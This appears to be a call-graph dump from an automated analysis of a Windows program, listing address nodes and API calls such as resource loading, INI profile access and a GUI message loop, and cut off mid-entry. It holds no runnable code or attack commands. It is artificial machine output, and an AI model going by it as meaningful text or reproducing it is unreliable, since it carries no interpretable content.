UnmapViewOfFile CloseHandle 37798->37799 37801 417c2c 37798->37801 37803 4175b7 37798->37803 37799->37798 37799->37799 37801->37798 37808 41851e 20 API calls 37801->37808 37804 4175d6 CloseHandle 37803->37804 37805 4175c8 37804->37805 37806 4175df 37804->37806 37805->37806 37807 4175ce Sleep 37805->37807 37806->37798 37807->37804 37808->37801 37809 4152c7 malloc 37810 4152ef 37809->37810 37812 4152e2 37809->37812 37813 416760 11 API calls 37810->37813 37813->37812 39972 4148b6 FindResourceW 39973 4148cf SizeofResource 39972->39973 39976 4148f9 39972->39976 39974 4148e0 LoadResource 39973->39974 39973->39976 39975 4148ee LockResource 39974->39975 39974->39976 39975->39976 37814 415308 free 39977 441b3f 39987 43a9f6 39977->39987 39979 441b61 40160 4386af memset 39979->40160 39981 44189a 39982 442bd4 39981->39982 39983 4418e2 39981->39983 39984 4418ea 39982->39984 40162 441409 memset 39982->40162 39983->39984 40161 4414a9 12 API calls 39983->40161 39988 43aa20 39987->39988 39989 43aadf 39987->39989 39988->39989 39990 43aa34 memset 39988->39990 39989->39979 39991 43aa56 39990->39991 39992 43aa4d 39990->39992 40163 43a6e7 39991->40163 40171 42c02e memset 39992->40171 39997 43aad3 40173 4169a7 11 API calls 39997->40173 39998 43aaae 39998->39989 39998->39997 40013 43aae5 39998->40013 40000 43ac18 40002 43ac47 40000->40002 40175 42bbd5 memcpy memcpy memcpy memset memcpy 40000->40175 40003 43aca8 40002->40003 40176 438eed 16 API calls 40002->40176 40007 43acd5 40003->40007 40178 4233ae 11 API calls 40003->40178 40006 43ac87 40177 4233c5 16 API calls 40006->40177 40179 423426 11 API calls 40007->40179 40011 43ace1 40180 439811 163 API calls 40011->40180 40012 43a9f6 161 API calls 40012->40013 40013->39989 40013->40000 40013->40012 40174 439bbb 22 API calls 40013->40174 40015 43acfd 40021 43ad2c 40015->40021 40181 438eed 16 API calls 40015->40181 40017 43ad19 40182 4233c5 16 API calls 40017->40182 40019 43ad58 40183 44081d 163 API calls 40019->40183 40021->40019 40023 43add9 40021->40023 40023->40023 40187 423426 11 API calls 40023->40187 40024 43ae3a memset 40025 43ae73 40024->40025 40188 42e1c0 147 API calls 40025->40188 40026 43adab 40185 438c4e 163 API calls 40026->40185 40028 43ad6c 40028->39989 40028->40026 40184 42370b memset memcpy memset 40028->40184 40030 43ae96 40189 42e1c0 147 API calls 40030->40189 40032 43adcc 40186 440f84 12 API calls 40032->40186 40035 43aea8 40036 43aec1 40035->40036 40190 42e199 147 API calls 40035->40190 40038 43af00 40036->40038 40191 42e1c0 147 API calls 40036->40191 40038->39989 40041 43af1a 40038->40041 40042 43b3d9 40038->40042 40192 438eed 16 API calls 40041->40192 40047 43b3f6 40042->40047 40054 43b4c8 40042->40054 40044 43b60f 40044->39989 40251 4393a5 17 API calls 40044->40251 40045 43af2f 40193 4233c5 16 API calls 40045->40193 40233 432878 12 API calls 40047->40233 40049 43af51 40194 423426 11 API calls 40049->40194 40052 43af7d 40195 423426 11 API calls 40052->40195 40053 43b4f2 40240 43a76c 21 API calls 40053->40240 40054->40053 40239 42bbd5 memcpy memcpy memcpy memset memcpy 40054->40239 40058 43b529 40241 44081d 163 API calls 40058->40241 40059 43b428 40087 43b462 40059->40087 40234 432b60 16 API calls 40059->40234 40060 43af94 40196 423330 11 API calls 40060->40196 40064 43b47e 40067 43b497 40064->40067 40236 42374a memcpy memset memcpy memcpy memcpy 40064->40236 40065 43b544 40075 43b55c 40065->40075 40242 42c02e memset 40065->40242 40066 43afca 40197 423330 11 API calls 40066->40197 40237 4233ae 11 API calls 40067->40237 40072 43afdb 40198 4233ae 11 API calls 40072->40198 40074 43b4b1 40238 423399 11 API calls 40074->40238 40243 43a87a 163 API calls 40075->40243 40077 43b56c 40080 43b58a 40077->40080 40244 423330 11 API calls 40077->40244 40079 43afee 40199 44081d 163 API calls 40079->40199 40245 440f84 12 API calls 40080->40245 40082 43b4c1 40247 42db80 163 API calls 40082->40247 40086 43b592 40246 43a82f 16 API calls 40086->40246 40235 423330 11 API calls 40087->40235 40090 43b5b4 40248 438c4e 163 API calls 40090->40248 40092 43b5cf 40249 42c02e memset 40092->40249 40094 43b005 40094->39989 40099 43b01f 40094->40099 40200 42d836 163 API calls 40094->40200 40095 43b1ef 40210 4233c5 16 API calls 40095->40210 40097 43b212 40211 423330 11 API calls 40097->40211 40099->40095 40208 423330 11 API calls 40099->40208 40209 42d71d 163 API calls 40099->40209 40101 43add4 40101->40044 40250 438f86 16 API calls 40101->40250 40104 43b087 40201 4233ae 11 API calls 40104->40201 40105 43b22a 40212 42ccb5 11 API calls 40105->40212 40108 43b10f 40204 423330 11 API calls 40108->40204 40109 43b23f 40213 4233ae 11 API calls 40109->40213 40111 43b257 40214 4233ae 11 API calls 40111->40214 40115 43b129 40205 4233ae 11 API calls 40115->40205 40116 43b26e 40215 4233ae 11 API calls 40116->40215 40118 43b09a 40118->40108 40202 42cc15 19 API calls 40118->40202 40203 4233ae 11 API calls 40118->40203 40120 43b282 40216 43a87a 163 API calls 40120->40216 40122 43b13c 40206 440f84 12 API calls 40122->40206 40124 43b29d 40217 423330 11 API calls 40124->40217 40127 43b15f 40207 4233ae 11 API calls 40127->40207 40128 43b2af 40130 43b2b8 40128->40130 40131 43b2ce 40128->40131 40218 4233ae 11 API calls 40130->40218 40219 440f84 12 API calls 40131->40219 40134 43b2c9 40221 4233ae 11 API calls 40134->40221 40135 43b2da 40220 42370b memset memcpy memset 40135->40220 40138 43b2f9 40222 423330 11 API calls 40138->40222 40140 43b30b 40223 423330 11 API calls 40140->40223 40142 43b325 40224 423399 11 API calls 40142->40224 40144 43b332 40225 4233ae 11 API calls 40144->40225 40146 43b354 40226 423399 11 API calls 40146->40226 40148 43b364 40227 43a82f 16 API calls 40148->40227 40150 43b370 40228 42db80 163 API calls 40150->40228 40152 43b380 40229 438c4e 163 API calls 40152->40229 40154 43b39e 40230 423399 11 API calls 40154->40230 40156 43b3ae 40231 43a76c 21 API calls 40156->40231 40158 43b3c3 40232 423399 11 API calls 40158->40232 40160->39981 40161->39984 40162->39982 40164 43a6f5 40163->40164 40170 43a765 40163->40170 40164->40170 40252 42a115 40164->40252 40168 43a73d 40169 42a115 147 API calls 40168->40169 40168->40170 40169->40170 40170->39989 40172 4397fd memset 40170->40172 40171->39991 40172->39998 40173->39989 40174->40013 40175->40002 40176->40006 40177->40003 40178->40007 40179->40011 40180->40015 40181->40017 40182->40021 40183->40028 40184->40026 40185->40032 40186->40101 40187->40024 40188->40030 40189->40035 40190->40036 40191->40036 40192->40045 40193->40049 40194->40052 40195->40060 40196->40066 40197->40072 40198->40079 40199->40094 40200->40104 40201->40118 40202->40118 40203->40118 40204->40115 40205->40122 40206->40127 40207->40099 40208->40099 40209->40099 40210->40097 40211->40105 40212->40109 40213->40111 40214->40116 40215->40120 40216->40124 40217->40128 40218->40134 40219->40135 40220->40134 40221->40138 40222->40140 40223->40142 40224->40144 40225->40146 40226->40148 40227->40150 40228->40152 40229->40154 40230->40156 40231->40158 40232->40101 40233->40059 40234->40087 40235->40064 40236->40067 40237->40074 40238->40082 40239->40053 40240->40058 40241->40065 40242->40075 40243->40077 40244->40080 40245->40086 40246->40082 40247->40090 40248->40092 40249->40101 40250->40044 40251->39989 40253 42a175 40252->40253 40255 42a122 40252->40255 40253->40170 40258 42b13b 147 API calls 40253->40258 40255->40253 40256 42a115 147 API calls 40255->40256 40259 43a174 40255->40259 40283 42a0a8 147 API calls 40255->40283 40256->40255 40258->40168 40273 43a196 40259->40273 40274 43a19e 40259->40274 40260 43a306 40260->40273 40299 4388c4 14 API calls 40260->40299 40263 42a115 147 API calls 40263->40274 40264 415a91 memset 40264->40274 40265 43a642 40265->40273 40303 4169a7 11 API calls 40265->40303 40269 43a635 40302 42c02e memset 40269->40302 40273->40255 40274->40260 40274->40263 40274->40264 40274->40273 40284 42ff8c 40274->40284 40292 4165ff 40274->40292 40295 439504 13 API calls 40274->40295 40296 4312d0 147 API calls 40274->40296 40297 42be4c memcpy memcpy memcpy memset memcpy 40274->40297 40298 43a121 11 API calls 40274->40298 40276 4169a7 11 API calls 40277 43a325 40276->40277 40277->40265 40277->40269 40277->40273 40277->40276 40278 42b5b5 memset memcpy 40277->40278 40279 42bf4c 14 API calls 40277->40279 40282 4165ff 11 API calls 40277->40282 40300 42b63e 14 API calls 40277->40300 40301 42bfcf memcpy 40277->40301 40278->40277 40279->40277 40282->40277 40283->40255 40304 43817e 40284->40304 40286 42ff99 40287 42ffe3 40286->40287 40288 42ffd0 40286->40288 40291 42ff9d 40286->40291 40309 4169a7 11 API calls 40287->40309 40308 4169a7 11 API calls 40288->40308 40291->40274 40293 4165a0 11 API calls 40292->40293 40294 41660d 40293->40294 40294->40274 40295->40274 40296->40274 40297->40274 40298->40274 40299->40277 40300->40277 40301->40277 40302->40265 40303->40273 40305 438187 40304->40305 40307 438192 40304->40307 40310 4380f6 40305->40310 40307->40286 40308->40291 40309->40291 40312 43811f 40310->40312 40311 438164 40311->40307 40312->40311 40314 4300e8 3 API calls 40312->40314 40315 437e5e 40312->40315 40314->40312 40338 437d3c 40315->40338 40317 437eb3 40317->40312 40318 437ea9 40318->40317 40324 437f22 40318->40324 40353 41f432 40318->40353 40321 437f06 40400 415c56 11 API calls 40321->40400 40323 437f95 40401 415c56 11 API calls 40323->40401 40325 437f7f 40324->40325 40326 432d4e 3 API calls 40324->40326 40325->40323 40328 43802b 40325->40328 40326->40325 40329 4165ff 11 API calls 40328->40329 40330 438054 40329->40330 40364 437371 40330->40364 40333 43806b 40334 438094 40333->40334 40402 42f50e 138 API calls 40333->40402 40336 437fa3 40334->40336 40337 4300e8 3 API calls 40334->40337 40336->40317 40403 41f638 104 API calls 40336->40403 40337->40336 40339 437d69 40338->40339 40342 437d80 40338->40342 40404 437ccb 11 API calls 40339->40404 40341 437d76 40341->40318 40342->40341 40343 437da3 40342->40343 40344 437d90 40342->40344 40346 438460 134 API calls 40343->40346 40344->40341 40408 437ccb 11 API calls 40344->40408 40349 437dcb 40346->40349 40348 437de8 40407 424f26 123 API calls 40348->40407 40349->40348 40405 444283 13 API calls 40349->40405 40351 437dfc 40406 437ccb 11 API calls 40351->40406 40354 41f54d 40353->40354 40360 41f44f 40353->40360 40355 41f466 40354->40355 40438 41c635 memset memset 40354->40438 40355->40321 40355->40324 40360->40355 40362 41f50b 40360->40362 40409 41f1a5 40360->40409 40434 41c06f memcmp 40360->40434 40435 41f3b1 90 API calls 40360->40435 40436 41f398 86 API calls 40360->40436 40362->40354 40362->40355 40437 41c295 86 API calls 40362->40437 40365 41703f 11 API calls 40364->40365 40366 437399 40365->40366 40367 43739d 40366->40367 40370 4373ac 40366->40370 40439 4446ea 11 API calls 40367->40439 40369 4373a7 40369->40333 40371 416935 16 API calls 40370->40371 40372 4373ca 40371->40372 40374 438460 134 API calls 40372->40374 40378 4251c4 137 API calls 40372->40378 40382 415a91 memset 40372->40382 40385 43758f 40372->40385 40397 437584 40372->40397 40399 437d3c 135 API calls 40372->40399 40440 425433 13 API calls 40372->40440 40441 425413 17 API calls 40372->40441 40442 42533e 16 API calls 40372->40442 40443 42538f 16 API calls 40372->40443 40444 42453e 123 API calls 40372->40444 40373 4375bc 40376 415c7d 16 API calls 40373->40376 40374->40372 40377 4375d2 40376->40377 40377->40369 40379 4442e6 11 API calls 40377->40379 40378->40372 40380 4375e2 40379->40380 40380->40369 40447 444283 13 API calls 40380->40447 40382->40372 40445 42453e 123 API calls 40385->40445 40386 4375f4 40391 437620 40386->40391 40392 43760b 40386->40392 40390 43759f 40393 416935 16 API calls 40390->40393 40395 416935 16 API calls 40391->40395 40448 444283 13 API calls 40392->40448 40393->40397 40395->40369 40397->40373 40446 42453e 123 API calls 40397->40446 40398 437612 memcpy 40398->40369 40399->40372 40400->40317 40401->40336 40402->40334 40403->40317 40404->40341 40405->40351 40406->40348 40407->40341 40408->40341 40410 41bc3b 101 API calls 40409->40410 40411 41f1b4 40410->40411 40412 41edad 86 API calls 40411->40412 40419 41f282 40411->40419 40413 41f1cb 40412->40413 40414 41f1f5 memcmp 40413->40414 40415 41f20e 40413->40415 40413->40419 40414->40415 40416 41f21b memcmp 40415->40416 40415->40419 40417 41f326 40416->40417 40420 41f23d 40416->40420 40418 41ee6b 86 API calls 40417->40418 40417->40419 40418->40419 40419->40360 40420->40417 40421 41f28e memcmp 40420->40421 40423 41c8df 56 API calls 40420->40423 40421->40417 40422 41f2a9 40421->40422 40422->40417 40425 41f308 40422->40425 40426 41f2d8 40422->40426 40424 41f269 40423->40424 40424->40417 40427 41f287 40424->40427 40428 41f27a 40424->40428 40425->40417 40432 4446ce 11 API calls 40425->40432 40429 41ee6b 86 API calls 40426->40429 40427->40421 40430 41ee6b 86 API calls 40428->40430 40431 41f2e0 40429->40431 40430->40419 40433 41b1ca memset 40431->40433 40432->40417 40433->40419 40434->40360 40435->40360 40436->40360 40437->40354 40438->40355 40439->40369 40440->40372 40441->40372 40442->40372 40443->40372 40444->40372 40445->40390 40446->40373 40447->40386 40448->40398 37815 41276d 37816 41277d 37815->37816 37858 4044a4 LoadLibraryW 37816->37858 37818 412785 37819 412789 37818->37819 37866 414b81 37818->37866 37822 4127c8 37872 412465 memset ??2@YAPAXI 37822->37872 37824 4127ea 37884 40ac21 37824->37884 37829 412813 37902 40dd07 memset 37829->37902 37830 412827 37907 40db69 memset 37830->37907 37833 412822 37928 4125b6 ??3@YAXPAX 37833->37928 37835 40ada2 _wcsicmp 37837 41283d 37835->37837 37837->37833 37840 412863 CoInitialize 37837->37840 37912 41268e 37837->37912 37932 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37840->37932 37843 41296f 37934 40b633 37843->37934 37845 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37850 412957 CoUninitialize 37845->37850 37855 4128ca 37845->37855 37850->37833 37851 4128d0 TranslateAcceleratorW 37852 412941 GetMessageW 37851->37852 37851->37855 37852->37850 37852->37851 37853 412909 IsDialogMessageW 37853->37852 37853->37855 37854 4128fd IsDialogMessageW 37854->37852 37854->37853 37855->37851 37855->37853 37855->37854 37856 41292b TranslateMessage DispatchMessageW 37855->37856 37857 41291f IsDialogMessageW 37855->37857 37856->37852 37857->37852 37857->37856 37859 4044f7 37858->37859 37860 4044cf GetProcAddress 37858->37860 37864 404507 MessageBoxW 37859->37864 37865 40451e 37859->37865 37861 4044e8 FreeLibrary 37860->37861 37862 4044df 37860->37862 37861->37859 37863 4044f3 37861->37863 37862->37861 37863->37859 37864->37818 37865->37818 37867 414b8a 37866->37867 37868 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37866->37868 37938 40a804 memset 37867->37938 37868->37822 37871 414b9e GetProcAddress 37871->37868 37873 4124e0 37872->37873 37874 412505 ??2@YAPAXI 37873->37874 37875 41251c 37874->37875 37880 412521 37874->37880 37960 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37875->37960 37949 444722 37880->37949 37883 41259b wcscpy 37883->37824 37965 40b1ab free free 37884->37965 37886 40ad76 37966 40aa04 37886->37966 37889 40a9ce malloc memcpy free free 37892 40ac5c 37889->37892 37890 40ad4b 37890->37886 37989 40a9ce 37890->37989 37892->37886 37892->37889 37892->37890 37893 40ace7 free 37892->37893 37969 40a8d0 37892->37969 37981 4099f4 37892->37981 37893->37892 37897 40a8d0 7 API calls 37897->37886 37898 40ada2 37899 40adc9 37898->37899 37900 40adaa 37898->37900 37899->37829 37899->37830 37900->37899 37901 40adb3 _wcsicmp 37900->37901 37901->37899 37901->37900 37994 40dce0 37902->37994 37904 40dd3a GetModuleHandleW 37999 40dba7 37904->37999 37908 40dce0 3 API calls 37907->37908 37909 40db99 37908->37909 38071 40dae1 37909->38071 38085 402f3a 37912->38085 37914 412766 37914->37833 37914->37840 37915 4126d3 _wcsicmp 37916 4126a8 37915->37916 37916->37914 37916->37915 37918 41270a 37916->37918 38119 4125f8 7 API calls 37916->38119 37918->37914 38088 411ac5 37918->38088 37929 4125da 37928->37929 37930 4125f0 37929->37930 37931 4125e6 DeleteObject 37929->37931 37933 40b1ab free free 37930->37933 37931->37930 37932->37845 37933->37843 37935 40b640 37934->37935 37936 40b639 free 37934->37936 37937 40b1ab free free 37935->37937 37936->37935 37937->37819 37939 40a83b GetSystemDirectoryW 37938->37939 37940 40a84c wcscpy 37938->37940 37939->37940 37945 409719 wcslen 37940->37945 37943 40a881 LoadLibraryW 37944 40a886 37943->37944 37944->37868 37944->37871 37946 409724 37945->37946 37947 409739 wcscat LoadLibraryW 37945->37947 37946->37947 37948 40972c wcscat 37946->37948 37947->37943 37947->37944 37948->37947 37950 444732 37949->37950 37951 444728 DeleteObject 37949->37951 37961 409cc3 37950->37961 37951->37950 37953 412551 37954 4010f9 37953->37954 37955 401130 37954->37955 37956 401134 GetModuleHandleW LoadIconW 37955->37956 37957 401107 wcsncat 37955->37957 37958 40a7be 37956->37958 37957->37955 37959 40a7d2 37958->37959 37959->37883 37959->37959 37960->37880 37964 409bfd memset wcscpy 37961->37964 37963 409cdb CreateFontIndirectW 37963->37953 37964->37963 37965->37892 37967 40aa14 37966->37967 37968 40aa0a free 37966->37968 37967->37898 37968->37967 37970 40a8eb 37969->37970 37971 40a8df wcslen 37969->37971 37972 40a906 free 37970->37972 37973 40a90f 37970->37973 37971->37970 37974 40a919 37972->37974 37975 4099f4 3 API calls 37973->37975 37976 40a932 37974->37976 37977 40a929 free 37974->37977 37975->37974 37979 4099f4 3 API calls 37976->37979 37978 40a93e memcpy 37977->37978 37978->37892 37980 40a93d 37979->37980 37980->37978 37982 409a41 37981->37982 37983 4099fb malloc 37981->37983 37982->37892 37985 409a37 37983->37985 37986 409a1c 37983->37986 37985->37892 37987 409a30 free 37986->37987 37988 409a20 memcpy 37986->37988 37987->37985 37988->37987 37990 40a9e7 37989->37990 37991 40a9dc free 37989->37991 37992 4099f4 3 API calls 37990->37992 37993 40a9f2 37991->37993 37992->37993 37993->37897 38018 409bca GetModuleFileNameW 37994->38018 37996 40dce6 wcsrchr 37997 40dcf5 37996->37997 37998 40dcf9 wcscat 37996->37998 37997->37998 37998->37904 38019 44db70 37999->38019 38003 40dbfd 38022 4447d9 38003->38022 38006 40dc34 wcscpy wcscpy 38048 40d6f5 38006->38048 38007 40dc1f wcscpy 38007->38006 38010 40d6f5 3 API calls 38011 40dc73 38010->38011 38012 40d6f5 3 API calls 38011->38012 38013 40dc89 38012->38013 38014 40d6f5 3 API calls 38013->38014 38015 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38014->38015 38054 40da80 38015->38054 38018->37996 38020 40dbb4 memset memset 38019->38020 38021 409bca GetModuleFileNameW 38020->38021 38021->38003 38023 4447f4 38022->38023 38024 40dc1b 38023->38024 38025 444807 ??2@YAPAXI 38023->38025 38024->38006 38024->38007 38026 44481f 38025->38026 38027 444873 _snwprintf 38026->38027 38028 4448ab wcscpy 38026->38028 38061 44474a 8 API calls 38027->38061 38030 4448bb 38028->38030 38062 44474a 8 API calls 38030->38062 38031 4448a7 38031->38028 38031->38030 38033 4448cd 38063 44474a 8 API calls 38033->38063 38035 4448e2 38064 44474a 8 API calls 38035->38064 38037 4448f7 38065 44474a 8 API calls 38037->38065 38039 44490c 38066 44474a 8 API calls 38039->38066 38041 444921 38067 44474a 8 API calls 38041->38067 38043 444936 38068 44474a 8 API calls 38043->38068 38045 44494b 38069 44474a 8 API calls 38045->38069 38047 444960 ??3@YAXPAX 38047->38024 38049 44db70 38048->38049 38050 40d702 memset GetPrivateProfileStringW 38049->38050 38051 40d752 38050->38051 38052 40d75c WritePrivateProfileStringW 38050->38052 38051->38052 38053 40d758 38051->38053 38052->38053 38053->38010 38055 44db70 38054->38055 38056 40da8d memset 38055->38056 38057 40daac LoadStringW 38056->38057 38060 40dac6 38057->38060 38059 40dade 38059->37833 38060->38057 38060->38059 38070 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38060->38070 38061->38031 38062->38033 38063->38035 38064->38037 38065->38039 38066->38041 38067->38043 38068->38045 38069->38047 38070->38060 38081 409b98 GetFileAttributesW 38071->38081 38073 40daea 38074 40daef wcscpy wcscpy GetPrivateProfileIntW 38073->38074 38080 40db63 38073->38080 38082 40d65d GetPrivateProfileStringW 38074->38082 38076 40db3e 38083 40d65d GetPrivateProfileStringW 38076->38083 38078 40db4f 38084 40d65d GetPrivateProfileStringW 38078->38084 38080->37835 38081->38073 38082->38076 38083->38078 38084->38080 38120 40eaff 38085->38120 38089 411ae2 memset 38088->38089 38090 411b8f 38088->38090 38160 409bca GetModuleFileNameW 38089->38160 38102 411a8b 38090->38102 38092 411b0a wcsrchr 38093 411b22 wcscat 38092->38093 38094 411b1f 38092->38094 38161 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38093->38161 38094->38093 38096 411b67 38162 402afb 38096->38162 38100 411b7f 38218 40ea13 SendMessageW memset SendMessageW 38100->38218 38103 402afb 27 API calls 38102->38103 38104 411ac0 38103->38104 38105 4110dc 38104->38105 38106 41113e 38105->38106 38111 4110f0 38105->38111 38243 40969c LoadCursorW SetCursor 38106->38243 38108 411143 38244 4032b4 38108->38244 38262 444a54 38108->38262 38109 4110f7 _wcsicmp 38109->38111 38110 411157 38112 40ada2 _wcsicmp 38110->38112 38111->38106 38111->38109 38265 410c46 10 API calls 38111->38265 38115 411167 38112->38115 38113 4111af 38115->38113 38116 4111a6 qsort 38115->38116 38116->38113 38119->37916 38121 40eb10 38120->38121 38133 40e8e0 38121->38133 38124 40eb6c memcpy memcpy 38125 40ebb7 38124->38125 38125->38124 38126 40ebf2 ??2@YAPAXI ??2@YAPAXI 38125->38126 38128 40d134 16 API calls 38125->38128 38127 40ec65 38126->38127 38129 40ec2e ??2@YAPAXI 38126->38129 38143 40ea7f 38127->38143 38128->38125 38129->38127 38132 402f49 38132->37916 38134 40e8f2 38133->38134 38135 40e8eb ??3@YAXPAX 38133->38135 38136 40e900 38134->38136 38137 40e8f9 ??3@YAXPAX 38134->38137 38135->38134 38138 40e911 38136->38138 38139 40e90a ??3@YAXPAX 38136->38139 38137->38136 38140 40e931 ??2@YAPAXI ??2@YAPAXI 38138->38140 38141 40e921 ??3@YAXPAX 38138->38141 38142 40e92a ??3@YAXPAX 38138->38142 38139->38138 38140->38124 38141->38142 38142->38140 38144 40aa04 free 38143->38144 38145 40ea88 38144->38145 38146 40aa04 free 38145->38146 38147 40ea90 38146->38147 38148 40aa04 free 38147->38148 38149 40ea98 38148->38149 38150 40aa04 free 38149->38150 38151 40eaa0 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eab3 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40eabd 38154->38155 38156 40a9ce 4 API calls 38155->38156 38157 40eac7 38156->38157 38158 40a9ce 4 API calls 38157->38158 38159 40ead1 38158->38159 38159->38132 38160->38092 38161->38096 38219 40b2cc 38162->38219 38164 402b0a 38165 40b2cc 27 API calls 38164->38165 38166 402b23 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b3a 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b54 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b6b 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402b82 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402b99 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bb0 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bc7 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402bde 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402bf5 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c0c 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c23 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c3a 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c51 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c68 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402c7f 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402c99 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cb3 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402cd5 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402cf0 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d0b 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d26 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d3e 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d59 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402d78 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402d93 38215->38216 38217 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38216->38217 38217->38100 38218->38090 38222 40b58d 38219->38222 38221 40b2d1 38221->38164 38223 40b5a4 GetModuleHandleW FindResourceW 38222->38223 38224 40b62e 38222->38224 38225 40b5c2 LoadResource 38223->38225 38227 40b5e7 38223->38227 38224->38221 38226 40b5d0 SizeofResource LockResource 38225->38226 38225->38227 38226->38227 38227->38224 38235 40afcf 38227->38235 38229 40b608 memcpy 38238 40b4d3 memcpy 38229->38238 38231 40b61e 38239 40b3c1 18 API calls 38231->38239 38233 40b626 38240 40b04b 38233->38240 38236 40b04b ??3@YAXPAX 38235->38236 38237 40afd7 ??2@YAPAXI 38236->38237 38237->38229 38238->38231 38239->38233 38241 40b051 ??3@YAXPAX 38240->38241 38242 40b05f 38240->38242 38241->38242 38242->38224 38243->38108 38245 4032c4 38244->38245 38246 40b633 free 38245->38246 38247 403316 38246->38247 38266 44553b 38247->38266 38251 403480 38464 40368c 15 API calls 38251->38464 38253 403489 38254 40b633 free 38253->38254 38256 403495 38254->38256 38255 40333c 38255->38251 38257 4033a9 memset memcpy 38255->38257 38258 4033ec wcscmp 38255->38258 38462 4028e7 11 API calls 38255->38462 38463 40f508 6 API calls 38255->38463 38256->38110 38257->38255 38257->38258 38258->38255 38261 403421 _wcsicmp 38261->38255 38263 444a64 FreeLibrary 38262->38263 38264 444a83 38262->38264 38263->38264 38264->38110 38265->38111 38267 445548 38266->38267 38268 445599 38267->38268 38465 40c768 38267->38465 38269 4455a8 memset 38268->38269 38276 4457f2 38268->38276 38548 403988 38269->38548 38279 445854 38276->38279 38650 403e2d memset memset memset memset memset 38276->38650 38277 4455e5 38288 445672 38277->38288 38293 44560f 38277->38293 38278 4458bb memset memset 38281 414c2e 17 API calls 38278->38281 38332 4458aa 38279->38332 38673 403c9c memset memset memset memset memset 38279->38673 38284 4458f9 38281->38284 38283 44595e memset memset 38291 414c2e 17 API calls 38283->38291 38292 40b2cc 27 API calls 38284->38292 38286 44558c 38532 444b06 38286->38532 38287 44557a 38287->38286 38746 4136c0 CoTaskMemFree 38287->38746 38559 403fbe memset memset memset memset memset 38288->38559 38289 445a00 memset memset 38696 414c2e 38289->38696 38290 445b22 38296 445bca 38290->38296 38297 445b38 memset memset memset 38290->38297 38301 44599c 38291->38301 38303 445909 38292->38303 38305 4087b3 338 API calls 38293->38305 38295 445849 38762 40b1ab free free 38295->38762 38304 445c8b memset memset 38296->38304 38370 445cf0 38296->38370 38308 445bd4 38297->38308 38309 445b98 38297->38309 38302 40b2cc 27 API calls 38301->38302 38316 4459ac 38302->38316 38313 409d1f 6 API calls 38303->38313 38317 414c2e 17 API calls 38304->38317 38314 445621 38305->38314 38306 44589f 38763 40b1ab free free 38306->38763 38307 445585 38747 41366b FreeLibrary 38307->38747 38323 414c2e 17 API calls 38308->38323 38309->38308 38319 445ba2 38309->38319 38312 403335 38461 4452e5 45 API calls 38312->38461 38327 445919 38313->38327 38748 4454bf 20 API calls 38314->38748 38315 445823 38315->38295 38337 4087b3 338 API calls 38315->38337 38328 409d1f 6 API calls 38316->38328 38329 445cc9 38317->38329 38835 4099c6 wcslen 38319->38835 38320 4456b2 38750 40b1ab free free 38320->38750 38322 40b2cc 27 API calls 38333 445a4f 38322->38333 38324 445be2 38323->38324 38335 40b2cc 27 API calls 38324->38335 38325 445d3d 38355 40b2cc 27 API calls 38325->38355 38326 445d88 memset memset memset 38338 414c2e 17 API calls 38326->38338 38764 409b98 GetFileAttributesW 38327->38764 38339 4459bc 38328->38339 38340 409d1f 6 API calls 38329->38340 38330 445879 38330->38306 38351 4087b3 338 API calls 38330->38351 38332->38278 38356 44594a 38332->38356 38712 409d1f wcslen wcslen 38333->38712 38345 445bf3 38335->38345 38337->38315 38348 445dde 38338->38348 38831 409b98 GetFileAttributesW 38339->38831 38350 445ce1 38340->38350 38341 445bb3 38838 445403 memset 38341->38838 38342 445680 38342->38320 38582 4087b3 memset 38342->38582 38354 409d1f 6 API calls 38345->38354 38346 445928 38346->38356 38765 40b6ef 38346->38765 38357 40b2cc 27 API calls 38348->38357 38855 409b98 GetFileAttributesW 38350->38855 38351->38330 38353 40b2cc 27 API calls 38362 445a94 38353->38362 38364 445c07 38354->38364 38365 445d54 _wcsicmp 38355->38365 38356->38283 38369 4459ed 38356->38369 38368 445def 38357->38368 38358 4459cb 38358->38369 38378 40b6ef 253 API calls 38358->38378 38717 40ae18 38362->38717 38363 44566d 38363->38276 38633 413d4c 38363->38633 38374 445389 259 API calls 38364->38374 38375 445d71 38365->38375 38438 445d67 38365->38438 38367 445665 38749 40b1ab free free 38367->38749 38376 409d1f 6 API calls 38368->38376 38369->38289 38369->38290 38370->38312 38370->38325 38370->38326 38371 445389 259 API calls 38371->38296 38380 445c17 38374->38380 38856 445093 23 API calls 38375->38856 38383 445e03 38376->38383 38378->38369 38379 4456d8 38385 